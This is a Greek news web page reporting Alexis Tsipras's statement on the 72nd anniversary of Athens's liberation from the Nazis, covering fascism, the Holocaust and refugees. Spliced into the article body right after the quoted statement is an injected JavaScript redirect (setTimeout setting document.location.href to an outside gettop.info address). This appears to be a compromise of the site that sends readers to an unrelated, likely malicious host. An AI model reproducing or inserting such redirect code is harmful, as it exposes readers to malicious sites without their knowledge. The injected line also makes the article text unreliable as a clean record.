Το μήνυμα Τσίπρα για την επέτειο απελευθέρωσης της Αθήνας

0
7

 

  Στο μήνυμά του για την 72η επέτειο της απελευθέρωσης της Αθήνας από τους Ναζί ο πρωθυπουργός Αλέξης Τσίπρας αναφέρθηκε στους σύγχρονους αγώνες ενάντια στον φασισμό.

Ο Αλέξης Τσίπρας τόνισε ότι η υφήλιος δεν πρέπει να ξεχάσει τη συντριπτική εμπειρία του Ολοκαυτώματος, ενώ επεσήμανε ότι οι πρόσφυγες δεν πρέπει να γίνουν το νέο αντικείμενο ρατσιστικής προπαγάνδας.

Αναλυτικότερα, το μήνυμα του πρωθυπουργού έχει ως εξής:

«Για πολλές δεκαετίες η Ελλάδα ήταν η μόνη χώρα που δεν γιόρταζε το τέλος του Β΄ Παγκοσμίου Πολέμου και την Απελευθέρωσή της από τους Ναζί. Ο λόγος ήταν προφανής. Την Απελευθέρωση ακολούθησαν γεγονότα που σημάδεψαν τη σύγχρονη ιστορία μας και κορυφώθηκαν με τον Εμφύλιο Πόλεμο. Και όποιος μιλούσε για την απελευθέρωση θα έπρεπε να μιλήσει και για αυτά.

Σήμερα, η 12η Οκτωβρίου γιορτάζεται ανοιχτά. Θυμόμαστε τη μέρα που η Αθήνα απαλλάχθηκε από τους κατακτητές. Τη μέρα που ο ελληνικός λαός κέρδισε άλλη μια φορά τη θέση του στο πάνθεον όσων αγωνίζονται απέναντι σε εχθρούς υπέρτερους σε μέγεθος και εξοπλισμό, μα όχι σε δίκαιο. Όσων θυσιάζονται για την ελευθερία και την δημοκρατία.

Δεν φοβόμαστε να μιλήσουμε για το παρελθόν. Και για τους αγώνες που αυτό προστάζει στο σήμερα. Για τους σύγχρονους αγώνες ενάντια στον φασισμό. Για να μην ξεχάσει ποτέ η υφήλιος τη συντριπτική εμπειρία του Ολοκαυτώματος. Για να μην γίνουν οι πρόσφυγες το νέο αντικείμενο ρατσιστικής προπαγάνδας. Για να σηκώσουμε την ελευθερία πάνω από το μίσος». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here